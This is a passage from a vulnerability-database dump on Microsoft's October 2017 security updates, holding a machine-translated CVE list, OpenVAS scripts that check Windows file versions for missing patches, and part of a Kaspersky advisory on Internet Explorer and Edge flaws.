vulnerability flaws bug \nMicrosoft Graphics Component \nCVE-2017-11763 \nMicrosoft Graphics long-distance code to perform vulnerability flaws bug \nMicrosoft Graphics Component \nCVE-2017-11762 \nMicrosoft Graphics long-distance code to perform vulnerability flaws bug \nMicrosoft Graphics Component \nCVE-2017-11824 \nWindows Graphics Component provide the right to exploit the flaws bug \nMicrosoft Graphics Component \nCVE-2017-8693 \nMicrosoft Graphics information leak vulnerability flaws bug \nThe Microsoft JET Database Engine \nCVE-2017-8718 \nThe Microsoft JET Database Engine long code perform vulnerability flaws bug \nThe Microsoft JET Database Engine \nCVE-2017-8717 \nThe Microsoft JET Database Engine long code perform vulnerability flaws bug \nMicrosoft Office \nCVE-2017-11776 \nMicrosoft Outlook information disclosure vulnerability flaws bug \nMicrosoft Office \nCVE-2017-11775 \nMicrosoft Office SharePoint [XSS](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>) vulnerability flaws bug \nMicrosoft Office \nCVE-2017-11774 \nMicrosoft Outlook network security feature bypass vulnerability flaws bug \nMicrosoft Office \nCVE-2017-11777 \nMicrosoft Office SharePoint [XSS](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>) vulnerability flaws bug \nMicrosoft Office \nCVE-2017-11826 \nMicrosoft Office memory the destruction of vulnerabilities flaws bug \nMicrosoft Office \nCVE-2017-11825 \nMicrosoft Office long distance code to perform vulnerability flaws bug \nMicrosoft Office \nADV170017 \nOffice Defense depth updates \nMicrosoft Office \nCVE-2017-11786 \nSkype for Business provide the right to exploit the flaws bug \nMicrosoft Office \nCVE-2017-11820 \nMicrosoft Office SharePoint [XSS](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)\n\n**[1] [[2]](<89593_2.htm>) [next](<89593_2.htm>)**\n", "modified": "2017-10-12T00:00:00", "published": "2017-10-12T00:00:00", "id": "MYHACK58:62201789593", "href": "http://www.myhack58.com/Article/html/3/62/2017/89593.htm", "title": "Microsoft windows October release of the 62 flaws vulnerability bug patch, and repair of the National researchers submitted the 0-day flaw vulnerability bug-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-05-06T14:31:32", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft security updates KB4040685.", "modified": "2019-05-03T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310811934", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811934", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (KB4040685)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (KB4040685)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811934\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-11790\", \"CVE-2017-11793\", \"CVE-2017-11810\", \"CVE-2017-11813\",\n \"CVE-2017-11822\");\n script_bugtraq_id(101077, 101141, 101081, 101083, 101122);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 11:55:08 +0530 (Wed, 11 Oct 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (KB4040685)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security updates KB4040685.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Internet Explorer improperly accesses objects in memory.\n\n - The way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - Internet Explorer improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code in the context of the current user, gain access to\n potentially sensitive information, spoof content or serve as a pivot and detect\n specific files on the user's computer.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 9.x,\n 10.x and 11.x\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040685\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, win7:2, win7x64:2, win2008r2:2, win2012:1, win2012R2:1,\n win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || !(ieVer =~ \"^(9|10|11)\")){\n exit(0);\n}\n\niePath = smb_get_system32root();\nif(!iePath ){\n exit(0);\n}\n\niedllVer = fetch_file_version(sysPath:iePath, file_name:\"Mshtml.dll\");\nif(!iedllVer){\n exit(0);\n}\n\n##Server 2008\nif(hotfix_check_sp(win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"9.0.8112.21061\")){\n Vulnerable_range = \"Less than 9.0.8112.21061\";\n }\n}\n\n# Win 2012\nelse if(hotfix_check_sp(win2012:1) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"10.0.9200.22277\")){\n Vulnerable_range = \"Less than 10.0.9200.22277\";\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1, win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"11.0.9600.18817\")){\n Vulnerable_range = \"Less than 11.0.9600.18817\";\n }\n}\n\nif(Vulnerable_range)\n{\n report = 'File checked: ' + iePath + \"\\Mshtml.dll\" + '\\n' +\n 'File version: ' + iedllVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-06T14:31:32", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4041681", "modified": "2019-05-03T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310812016", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812016", "title": "Microsoft Windows Multiple Vulnerabilities (KB4041681)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4041681)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812016\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-11762\", \"CVE-2017-8694\", \"CVE-2017-8717\", \"CVE-2017-8718\",\n \"CVE-2017-11763\", \"CVE-2017-11765\", \"CVE-2017-8727\", \"CVE-2017-11771\",\n \"CVE-2017-11772\", \"CVE-2017-11780\", \"CVE-2017-11781\", \"CVE-2017-11784\",\n \"CVE-2017-11785\", \"CVE-2017-11790\", \"CVE-2017-11793\", \"CVE-2017-11810\",\n \"CVE-2017-11813\", \"CVE-2017-11814\", \"CVE-2017-11815\", \"CVE-2017-11816\",\n \"CVE-2017-11817\", \"CVE-2017-11819\", \"CVE-2017-11822\", \"CVE-2017-11824\",\n \"CVE-2017-8689\", \"CVE-2017-13080\");\n script_bugtraq_id(101108, 101100, 101161, 101162, 101109, 101111, 101142, 101114,\n 101116, 101110, 101140, 101147, 101149, 101077, 101141, 101081,\n 101083, 101093, 101136, 101094, 101095, 101121, 101122, 101099,\n 101128, 101274);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 08:41:12 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4041681)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4041681\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A spoofing vulnerability in the Windows implementation of wireless networking (KRACK)\n\n - An error in the Microsoft Server Block Message (SMB) when an attacker sends\n specially crafted requests to the server.\n\n - An error in the Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space Layout Randomization\n (ASLR) bypass.\n\n - An error when the Windows kernel improperly handles objects in memory.\n\n - An error when the Windows font library improperly handles specially crafted\n embedded fonts.\n\n - An error when the Windows kernel-mode driver fails to properly handle objects\n in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error in the Microsoft JET Database Engine that could allow remote code\n execution on an affected system.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows Graphics Component improperly handles objects in\n memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Internet Explorer.\n\n - An error when Internet Explorer improperly accesses objects in memory via the\n Microsoft Windows Text Services Framework.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error in the way that Microsoft browsers access objects in memory.\n\n - An error when the Windows kernel improperly initializes objects in memory.\n\n - An error in the way that the Windows Graphics Device Interface (GDI) handles\n objects in memory, allowing an attacker to retrieve information from a targeted\n system.\n\n - An error in the way that the Windows SMB Server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, conduct denial-of-service, gain access to potentially\n sensitive information, take control of the affected system and gain escalated\n privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4041681\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23914\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23914\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-06T14:31:34", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4041690", "modified": "2019-05-03T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310811927", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811927", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4041690)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4041690)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811927\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-11762\", \"CVE-2017-8694\", \"CVE-2017-8717\", \"CVE-2017-11763\",\n \"CVE-2017-11765\", \"CVE-2017-8718\", \"CVE-2017-8727\", \"CVE-2017-11815\",\n \"CVE-2017-11771\", \"CVE-2017-11772\", \"CVE-2017-11779\", \"CVE-2017-11780\",\n \"CVE-2017-11781\", \"CVE-2017-11784\", \"CVE-2017-11785\", \"CVE-2017-11790\",\n \"CVE-2017-11793\", \"CVE-2017-11810\", \"CVE-2017-11816\", \"CVE-2017-11817\",\n \"CVE-2017-11818\", \"CVE-2017-11824\", \"CVE-2017-11814\", \"CVE-2017-13080\");\n script_bugtraq_id(101108, 101100, 101161, 101109, 101111, 101162, 101142, 101114,\n 101116, 101166, 101110, 101140, 101147, 101149, 101077, 101141,\n 101081, 101094, 101095, 101101, 101099, 101093, 101136, 101274);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 08:59:57 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4041690)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4041690\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A spoofing vulnerability in the Windows implementation of wireless networking (KRACK)\n\n - An error in USBHUB.SYS randomly causes memory corruption that results in\n random system crashes that are extremely difficult to diagnose.\n\n - Security updates to Microsoft Windows Search Component, Windows kernel-mode drivers,\n Microsoft Graphics Component, Internet Explorer, Windows kernel, Windows Wireless\n Networking, Windows Storage and File systems, Microsoft Windows DNS, Microsoft JET\n Database Engine, and the Windows SMB Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the security context of the local system to take\n complete control of an affected system, gain access to potentially sensitive\n information, conduct a denial-of-service condition, bypass certain security\n restrictions and gain elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4041690\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"shell32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22281\"))\n{\n report = 'File checked: ' + sysPath + \"\\shell32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22281\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-06T14:31:34", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4041693", "modified": "2019-05-03T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310812022", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812022", "title": "Microsoft Windows Multiple Vulnerabilities (KB4041693)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4041693)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812022\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-11762\", \"CVE-2017-8694\", \"CVE-2017-8717\", \"CVE-2017-8718\",\n \"CVE-2017-11763\", \"CVE-2017-11765\", \"CVE-2017-8727\", \"CVE-2017-11771\",\n \"CVE-2017-11772\", \"CVE-2017-11779\", \"CVE-2017-11780\", \"CVE-2017-11781\",\n \"CVE-2017-11783\", \"CVE-2017-11784\", \"CVE-2017-11785\", \"CVE-2017-11790\",\n \"CVE-2017-11793\", \"CVE-2017-11810\", \"CVE-2017-11813\", \"CVE-2017-11814\",\n \"CVE-2017-11815\", \"CVE-2017-11816\", \"CVE-2017-11817\", \"CVE-2017-11818\",\n \"CVE-2017-11822\", \"CVE-2017-11824\", \"CVE-2017-8689\", \"CVE-2017-13080\");\n script_bugtraq_id(101108, 101100, 101161, 101162, 101109, 101111, 101142, 101114,\n 101116, 101166, 101110, 101140, 101144, 101147, 101149, 101077,\n 101141, 101081, 101083, 101093, 101136, 101094, 101095, 101101,\n 101122, 101099, 101128, 101274);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 09:41:11 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4041693)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4041693\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A spoofing vulnerability in the Windows implementation of wireless networking (KRACK)\n\n - An error when Windows improperly handles calls to Advanced Local Procedure\n Call (ALPC).\n\n - An error in the Microsoft Server Block Message (SMB) when an attacker sends\n specially crafted requests to the server.\n\n - An error in the Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space Layout Randomization\n (ASLR) bypass.\n\n - An error in certain Trusted Platform Module (TPM) chipsets.\n\n - An error when the Windows kernel improperly handles objects in memory.\n\n - An error when the Windows font library improperly handles specially crafted\n embedded fonts.\n\n - An error when the Windows kernel-mode driver fails to properly handle objects\n in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error in the Microsoft JET Database Engine that could allow remote code\n execution on an affected system.\n\n - An error when the Windows Graphics Component improperly handles objects in\n memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Internet Explorer.\n\n - An error when Internet Explorer improperly accesses objects in memory via\n the Microsoft Windows Text Services Framework.\n\n - An error in Windows Domain Name System (DNS) DNSAPI.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error when Windows Search handles objects in memory.\n\n - An error in Microsoft Windows storage when it fails to validate an\n integrity-level check.\n\n - An error in the way that the Windows Graphics Device Interface (GDI) handles\n objects in memory, allowing an attacker to retrieve information from a targeted\n system.\n\n - An error in the way that the Windows SMB Server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited this vulnerability to run arbitrary code in the\n security context of the local system, cause the affected system to crash, gain\n access to potentially sensitive information, take control of an affected system\n and gain the same user rights as the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8.1 for 32-bit/x64\n\n Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4041693\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"gdi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.18818\"))\n{\n report = 'File checked: ' + sysPath + \"\\gdi32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.3.9600.18818\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:30", "bulletinFamily": "info", "description": "### *Detect date*:\n10/10/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Edge and Microsoft Internet Explorer. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Edge \nMicrosoft Internet Explorer versions 9 through 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11790>) \n[CVE-2017-11792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11792>) \n[CVE-2017-11793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11793>) \n[CVE-2017-11794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11794>) \n[CVE-2017-11796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11796>) \n[CVE-2017-11798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11798>) \n[CVE-2017-11813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11813>) \n[CVE-2017-11812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11812>) \n[CVE-2017-11811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11811>) \n[CVE-2017-11810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11810>) \n[CVE-2017-11810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11810>) \n[CVE-2017-11811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11811>) \n[CVE-2017-11812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11812>) \n[CVE-2017-11813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11813>) \n[CVE-2017-11790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11790>) \n[CVE-2017-11792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11792>) \n[CVE-2017-11793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11793>) \n[CVE-2017-11794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11794>) \n[CVE-2017-11796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11796>) \n[CVE-2017-11798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11798>) \n[CVE-2017-11800](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11800>) \n[CVE-2017-11805](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11805>) \n[CVE-2017-11808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11808>) \n[CVE-2017-11804](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11804>) \n[CVE-2017-11809](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11809>) \n[CVE-2017-11799](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11799>) \n[CVE-2017-11822](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11822>) \n[CVE-2017-11806](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11806>) \n[CVE-2017-11802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11802>) \n[CVE-2017-11807](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11807>) \n[CVE-2017-8726](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8726>) \n[CVE-2017-11821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11821>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-11810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11810>)7.6Critical \n[CVE-2017-11811](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11811>)7.5Critical \n[CVE-2017-11812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11812>)7.5Critical \n[CVE-2017-11813](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11813>)7.6Critical \n[CVE-2017-11790](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11790>)4.3Critical \n[CVE-2017-11792](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11792>)7.5Critical 